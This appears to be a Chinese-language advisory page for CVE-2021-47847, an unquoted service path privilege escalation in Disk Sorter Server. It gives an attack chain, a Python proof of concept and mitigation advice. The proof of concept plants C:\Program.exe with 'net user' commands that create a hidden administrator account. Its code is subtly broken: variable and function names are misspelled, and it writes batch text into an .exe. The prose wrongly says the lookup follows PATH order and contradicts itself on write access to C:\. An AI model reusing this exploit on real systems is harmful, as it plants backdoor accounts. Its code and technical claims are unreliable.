CVE-2021-47847 Disk Sorter Server未引号服务路径权限提升漏洞

漏洞信息

漏洞编号

CVE-2021-47847

漏洞类型

未引号服务路径

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Disk Sorter Server

漏洞概述

CVE-2021-47847是影响Disk Sorter Server 13.6.12版本的一个高危本地权限提升漏洞。该漏洞存在于Windows服务的二进制路径配置中，由于可执行文件路径未使用引号包裹，导致Windows服务在启动时按照PATH环境变量的搜索顺序查找可执行文件。攻击者可以利用这一特性，在服务路径的中间目录中植入恶意可执行文件，当服务重启或系统启动时，恶意程序将以SYSTEM高权限自动执行，从而实现权限提升和持久化攻击。此漏洞CVSS评分7.8，属于高危级别，需要本地低权限访问即可利用，无需用户交互即可实现攻击。

技术细节

漏洞位于Disk Sorter Server的Windows服务配置中，服务可执行文件路径为'C:\Program Files\Disk Sorter Server\bin\disksrs.exe'。由于路径中包含空格且未被引号包裹，Windows服务控制管理器(SCM)在启动服务时会按照以下顺序搜索可执行文件：首先查找'C:\Program.exe'，然后查找'C:\Program Files\Disk.exe'，最后才查找完整的'disksrs.exe'路径。攻击者只需在C:\根目录创建名为'Program.exe'的恶意可执行文件，或在C:\Program Files\创建名为'Disk.exe'的文件，即可劫持服务启动过程。Disk Sorter Server服务默认以SYSTEM最高权限运行，攻击成功后将获得系统级完全控制权。该漏洞可被用于横向移动和持久化攻击。

攻击链分析

STEP 1

步骤1: 侦察和信息收集

攻击者首先进行本地侦察，通过WMIC、PowerShell或注册表查询确认Disk Sorter Server是否安装以及服务配置信息，验证服务路径是否包含空格且未被引号包裹。

STEP 2

步骤2: 权限检查

确认当前用户具有在C:\根目录或C:\Program Files\目录创建文件的写权限，通常低权限用户对C:\根目录具有写入权限，这是漏洞利用的前提条件。

STEP 3

步骤3: 恶意可执行文件创建

攻击者在服务路径的中间目录创建恶意可执行文件。根据搜索顺序，可以创建'C:\Program.exe'或'C:\Program Files\Disk.exe'，文件名必须与服务路径中的第一个或第二个空格分隔的单词匹配。

STEP 4

步骤4: 服务重启触发

等待服务重启、系统重启或管理员手动重启服务。Windows服务控制管理器在启动服务时会按照PATH搜索顺序查找可执行文件，首先找到攻击者创建的恶意程序而非原始的disksrs.exe。

STEP 5

步骤5: 权限提升和持久化

恶意程序以SYSTEM高权限执行，攻击者获得系统完全控制权。常见的后续操作包括创建管理员账户、植入后门、窃取凭据或横向移动到其他系统。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2021-47847 PoC - Disk Sorter Server Unquoted Service Path
# This PoC demonstrates creating a malicious executable in the unquoted path
# NOTE: This is for educational and authorized testing purposes only

import os
import ctypes
import sys

def create_malicious_executable():
    """
    Create a malicious executable that will be placed in the unquoted path
    to achieve privilege escalation via Disk Sorter Server service
    """
    # Malicious executable path (C:\Program.exe will be searched before the full path)
    malicious_path = r'C:\Program.exe'
    
    # Create a simple reverse shell or payload
    # This example creates a batch file wrapper (actual malware would be a compiled binary)
    malicious_code = '''@echo off
rem CVE-2021-47847 - Malicious payload injected via unquoted service path
rem This will execute with SYSTEM privileges when Disk Sorter service starts
net user attacker P@ssw0rd123! /add
net localgroup Administrators attacker /add
'''
    
    try:
        with open(malicious_path, 'w') as f:
            f.write(mallicious_code)
        print(f'[+] Malicious executable created at: {malicious_path}')
        print('[+] Wait for service restart or system reboot to trigger execution')
        return True
    except PermissionError:
        print('[-] Administrator privileges required to write to C:\\')
        return False
    except Exception as e:
        print(f'[-] Error: {e}')
        return False

def check_vulnerability():
    """
    Check if Disk Sorter Server is installed and verify unquoted path vulnerability
    """
    service_path = r'C:\Program Files\Disk Sorter Server\bin\disksrs.exe'
    
    if os.path.exists(service_path):
        print(f'[+] Disk Sorter Server found at: {service_path}')
        print('[+] Service path is UNQUOTED - vulnerable to path hijacking')
        print('[+] Attack vector: Create malicious executable in C:\\ or C:\\Program Files\\')
        return True
    else:
        print('[-] Disk Sorter Server not found on this system')
        return False

if __name__ == '__main__':
    if check_vulnerability():
        create_mallicious_executable()

影响范围

Disk Sorter Server <= 13.6.12

防御指南

临时缓解措施

立即采取以下临时缓解措施：首先，限制非管理员用户对C:\根目录的写权限，移除Everyone用户对该目录的写入权限；其次，将Disk Sorter服务改为手动启动而非自动启动，减少服务重启频率；最后，部署文件完整性监控(FIM)工具，监控C:\和C:\Program Files\目录下可疑可执行文件的创建行为。同时建议尽快联系厂商获取正式补丁进行升级。